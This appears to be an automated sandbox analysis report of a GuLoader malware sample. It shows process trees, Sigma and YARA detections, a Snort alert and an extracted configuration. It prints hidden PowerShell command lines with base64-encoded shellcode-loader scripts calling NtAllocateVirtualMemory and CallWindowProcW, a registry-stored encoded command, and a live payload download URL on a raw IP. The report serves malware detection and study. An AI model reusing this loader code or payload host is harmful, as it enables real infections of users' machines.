AGEAdABoACAAIgBzAGsAcgBrACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHQAZQBvAHMAbwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAG0AcwBrAGkAZgB0AGUAbAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAEUASQBaACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAYQBpAG4ANwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AZABlAHQAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAEEAUgBJAEYARgBJAFMAIgAgAA0ACgA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 7744 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 7396 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34E6.tmp" "c:\Users\user\AppData\Local\Temp\CSC77023F4354E6477E97855CB603CA0.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • ieinstal.exe (PID: 3424 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
  • powershell.exe (PID: 2072 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjAG8AcgBwAG8AcgAgAHAAdQBsAGwAaQBjACAAUwBwAGkAbgBrAGUAdABjAGUAIABTAHAAYQByAHIAZQBoAHkAIABrAG8AbgB0AHIAYQBiACAAUwBWAEkATgBFAEEAVgBMAEUATgAgAGsAbwBuAHQAbwAgAFIAZQB2AGEAbABpAGQAZQBuAGQAMQAgAFMAZQBrAHUAbgAgAE0AeQBlAGwAIABDAGwAeQBzAHQAZQByAGkAegA0ACAAQQBsAGEAbABvAG4AZwBhAGEAZgAgAEEAcgBiAGkAdAByAGEAdABlADMAIABhAGYAdABlAG4AaABpACAAUwBUAEUAUgBJACAARQByAGsAbAA2ACAAQQBHAEwATwBTAFMAQQBMAEIARQAgAEEAbABtAGUAcgBpAGUAcwAzACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAFUAUgBFAEEAVQBLAFIAQQBUACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwAzAD0AMAA7AA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATwBwAGkAcwB0AGgAbwBjADMAOAA9AFsATwBwAGkAcwB0AGgAbwBjADMAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABPAHAAaQBzAHQAaABvAGMAMwAzACwAMAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBzAHQAagBtAGEAYQBsAGkAbgBnACAAZgBqAGUAcgBsAGUAdAAgAFQAdwBpAG4AcwAgAEIAQQBKAEEAUgBJAEcAIABOAGEAdAB1AHIAcAAgAEUAcgBzAGUAdQBuACAAcAByAG8AZwByAGEAIABDAGgAaQBuAGwAIABDAG8AbQBwAGkAMQAgAE0AZQBsAGwAZQBtAGsAIABVAG4AcwBjAGEAbABhADkAIABYAGUAbgBhAGMAYQA0ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AdABlACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA0AD0AWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBwAGkAcwB0AGgAbwBjADMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBQAGkAegB6AGwAZQBqAGEAIABkAGkAaABhAGwAbwBnACAARgBvAHIAZQBtAGEAcwB0AGgAYQA2ACAAUwB0AGUAZQBrAGsAYQBuAG4ANwAgAHAAdQBkAHMAIABVAE4ARABFAFIARwBSAFUATgBEACAATABlAGcAYQB0AGkAbwAgAEcAeQBwAHQAZQByAGUAbgBkAHIAOQAgAEcAcgBhAHQAYwBhAHIAaQBzAHMAIABzAHAAbwByAHQAcwB0AHIAYQBpACAAVABFAE8AUwAgAFMAaABpAHAAYgBvAHIAbgA3ACAATwBWAEUAUgBTAEkATAAgAEEAYQBzAGUAbgB0AGEAaQAgAE8AUABTAE8ATgBJAEYAIABTAHUAYwBjAGUAcwBzAGkAbwAxACAAdQBkAG0AYQB0AHQAZQAgAG8AawBzAGUAaABhAGwAZQByAGYAIABsAGUAdgBlAHIAIABTAGUAagBnAHIAdQBwAHAAZQA5ACAAUwBrAGEAYQBuADYAIABJAG4AcwB0AHIAdQBtAGUAbgAgAEMAdQB0AGwAYQA0ACAAQQBzAHQAcgBvAG4AYQB1AHQAMgAgAG0AaQBjAHIAbwBtAGkAbgBlAHIAIABCAEEATQBTAEkATQBQAEkAIABFAHgAdABlAG4AcwBvAHIAeQBjACAATwB2AGUAcgBiAGwAaQA2ACAARAByAGkAYgBsAGkAbgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBzAGUAbQBwAGwAYQA4ACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA1AD0AMAA7AA0ACgAjAFQASQBMAEwARQBNAFAARQBOACAAbABvAGcAbwBtACAAbgBpAGMAYQByACAAbgBvAG4AdQBzAGUAYQBwAHIAbwAgAHAAdQByAHAAbABlAGgAZQBhACAAUwBFAE0ASQBIAE8AQgBPAFQAIABkAGUAbABpAGcAaAAgAFAATwBPAFIASABPAFUAUwAgAEIAdQBkAGcANAAgAEUARABHAEUARABSACAARwBvAGwAawBhAGsAcgBhAGEAMQAgAEMAbwByAG4AZQBsAGkAcwBzAHAAIABSAEQARABFAFIATABJAEcARQBSACAAUwB5AG4AbwBuAHkAbQBlAHIAbgA0ACAAYwByAGUAYQB0AHUAcgBlAHMAIABDAG8AbQBpAG4AZgBvAHIAbQBpACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAE8AUwBUAFAAWQBSAEEATQBJACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATwBwAGkAcwB0AGgAbwBjADMANAAsACQATwBwAGkAcwB0AGgAbwBjADMAMwAsADQAOAAyADUAOAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADUALAAwACkADQAKACMARgBSAEEATgBDAEUAUwBDAE8ARQAgAG4AbwBuAHQAcgBhAG4AIABPAGIAcwBrACAAaQBuAGEAbABpAGUAIABGAG8AcgBlACAAVQBSAE4ARQAgAEwAbwBuAGcAZQBzAHQAIABDAGEAdABnAHUAdABzAGsAbwAgAFYAYQBsAGUAbgBzAGUAcgBzADUAIAB2AG8AbABvAG4AdAByAGUAIABKAG8AcgBkAGEAbgBpAGEAbgBhACAATQBlAHQAYQBwAGgAZwBlADgAIABHAEUATgBOAEUATQAgAGUAbgByAGEAcAB0ACAAVQBuAGkAbgB0ADEAIABVAHAAYQBhAHYAaQBzAGUAbAAzACAAVABJAFAATgAgAEIAYQBpAHIAbgBsAGkAZQByACAARABpAHMAcgAyACAAdAByAGEAYwBoAGUAbwBwACAATgBvAG4AYwBvAG4AdAAxACAATQBVAFMASwBJAFMASABCACAAVABSAFIARQBTAE4AIABQAFIARQBIAE8AUgBJACAAUwB0AHIAaQBrAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUATgBTAFEAVQBBACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABPAHAAaQBzAHQAaABvAGMAMwAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAGkAcwBlAGwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwByAGMAaABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAcABlAGoAZABlAG4AZAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEgARQBSAEUAVQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAHUAdABpAHoAMQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAEEAUgBFAFMAUwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzAGsAcgBrACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHQAZQBvAHMAbwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAG0AcwBrAGkAZgB0AGUAbAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAEUASQBaACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAYQBpAG4ANwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AZABlAHQAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAEEAUgBJAEYARgBJAFMAIgAgAA0ACgA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 6980 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 6744 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES728B.tmp" "c:\Users\user\AppData\Local\Temp\CSC9CB81DB86B7E400B9F74BAF89293FF3.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • ieinstal.exe (PID: 1580 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
  • powershell.exe (PID: 5176 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://103.167.84.150/mconta/Host_DwUbTLydN243.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000000.16108270980.0000000003000000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000D.00000002.16237325177.0000000009770000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      0000000E.00000002.16379281085.00000000098B0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000003.00000002.15295840627.0000000009B70000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000013.00000002.16194415539.0000000002D20000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 6 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAE
            Sigma detected: Non Interactive PowerShellShow sources
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjA
            Sigma detected: T1086 PowerShell ExecutionShow sources
            Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132823131356829074.6584.DefaultAppDomain.powershell

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000014.00000000.16108270980.0000000003000000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://103.167.84.150/mconta/Host_DwUbTLydN243.bin"}
            Source: Binary string: $pm/C:\Users\user\AppData\Local\Temp\mla4kvb3.pdb source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmp
            Source: Binary string: $pm/C:\Users\user\AppData\Local\Temp\vybs2gqu.pdb source: powershell.exe, 0000000E.00000002.16353125853.0000000005015000.00000004.00000001.sdmp
            Source: Binary string: $pm/C:\Users\user\AppData\Local\Temp\uotckr0j.pdb source: powershell.exe, 0000000D.00000002.16211068158.0000000004F11000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16210155377.0000000004E74000.00000004.00000001.sdmp

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49805 -> 103.167.84.150:80
